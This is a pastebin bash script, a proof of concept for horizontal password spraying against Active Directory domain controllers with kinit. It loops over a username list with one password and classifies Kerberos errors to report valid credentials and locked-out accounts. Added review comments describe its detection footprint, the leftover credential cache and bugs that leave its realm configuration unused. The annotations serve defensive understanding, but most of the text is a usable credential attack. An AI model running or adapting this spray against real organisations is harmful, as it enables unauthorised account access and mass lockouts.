a guest
Jul 28th, 2017
#!/bin/bash

# Title: kinit_user_brute.sh
# Author: @ropnop
# Description: This is a PoC for doing horizontal password sprays using 'kinit' to try to check out a TGT from a Domain Controller
# The script configures the realm and KDC for you based on the domain provided and the domain controller
# Since this configuration is only temporary though, if you want to actually *use* the TGT you should actually edit /etc/krb5.conf
# Only tested with Heimdal kerberos (error messages might be different for MIT clients)
#
# Review notes (a defender's reading of what the script does as written):
# - One kinit invocation per wordlist line, all with the same password. On the KDC side
#   that is one TGT request per listed account from a single source in a short window,
#   which is exactly the shape account-lockout thresholds and spray detections key on.
# - The password, domain and wordlist path are positional arguments, so they are visible
#   in the process list and in the shell history of the host running this.
# - A run that reaches the "Valid" branch leaves a TGT in kinit's default credential
#   cache on this host; nothing below clears it, and the temp config file is never removed.

# Positional arguments; no validation beyond the argument-count check below.
DOMAIN=$1
DOMAINCONTROLLER=$2
WORDLIST=$3
PASSWORD=$4

if [[ $# -ne 4 ]]; then
  echo "[!] Usage: ./kinit_user_brute.sh <domain> <domain controller> <username list> <password>"
  echo "[!] Example: ./kinit_user_brute.sh contoso.com dc1.contoso.com usernames.txt Password123"
  exit 1
fi

# Realm names are conventionally upper-case. $DOMAIN is unquoted in the pipeline, so a
# value with whitespace or glob characters would be word-split before awk sees it.
DOMAIN=$(echo $DOMAIN | awk '{print toupper($0)}')

echo "[+] Kerberos Realm: $DOMAIN"
echo "[+] KDC: $DOMAINCONTROLLER"
echo ""

# Temporary krb5.conf. NOTE(review): the here-doc delimiter is quoted ('asdfasdf'), so the
# body is written literally -- $DOMAIN and $DOMAINCONTROLLER are not expanded -- and
# KRB5_CONF is neither exported nor referenced anywhere below. kinit therefore presumably
# runs against whatever Kerberos configuration the host already has; the header's claim
# that the realm/KDC are configured for you does not hold for this version of the script.
KRB5_CONF=$(mktemp)

cat > $KRB5_CONF <<'asdfasdf'
[libdefaults]
default_realm = $DOMAIN
[realms]
$DOMAIN = {
kdc = $DOMAINCONTROLLER
admin_server = $DOMAINCONTROLLER
}
asdfasdf

START_TIME=$SECONDS
COUNT=0

# Main loop: one kinit attempt per wordlist line. `read` without -r interprets backslashes,
# and $USERNAME is passed to kinit unquoted, so unusual lines are mangled or word-split.
while read USERNAME; do
  # NOTE(review): assigned to USERNAWME (typo) and never read, so the '@'-stripping has
  # no effect and kinit below receives the wordlist line unchanged.
  USERNAWME=$(echo $USERNAME | awk -F@ '{print $1}')
  # The password reaches kinit via stdin rather than argv; stderr is merged into RESULT so
  # the error text can be pattern-matched below. The strings matched are Heimdal's (see header).
  RESULT=$(
    echo $PASSWORD | kinit --password-file=STDIN $USERNAME 2>&1
  )
  if [[ $RESULT == *"unable to reach"* ]]; then
    # Fatal: KDC not reachable, stop rather than burn through the list.
    echo "[!] Unable to find KDC for realm. Check domain and DC"
    exit 1
  elif [[ $RESULT == *"Wrong realm"* ]]; then
    echo "[!] Wrong realm. Make sure domain and DC are correct"
    exit 1
  elif [[ $RESULT == *"Clients credentials have been revoked"* ]]; then
    # Reported as locked out (the script's own label; presumably a locked or disabled
    # account, which is what a lockout policy produces after repeated failures).
    # Not fatal: the loop continues with the next user.
    echo "[!] $USERNAME is locked out!"
  elif [[ $RESULT == *"Client"* ]] && [[ $RESULT == *"unknown"* ]]; then
    # username does not exist
    : # pass
  elif [[ -z "$RESULT" ]]; then
    # kinit printed nothing, which the script treats as success: a TGT for this principal
    # is now in the default credential cache on this host.
    echo "[+] Valid: $USERNAME@$DOMAIN : $PASSWORD"
  else
    # Any other message (presumably including an ordinary wrong-password failure) is
    # echoed verbatim rather than classified.
    echo "[+] Error trying $USERNAME: $RESULT"
  fi
  COUNT=$(($COUNT+1))
done <$WORDLIST

echo ""
echo "Tested \"$PASSWORD\" against $COUNT users in $(($SECONDS - $START_TIME)) seconds"
echo ""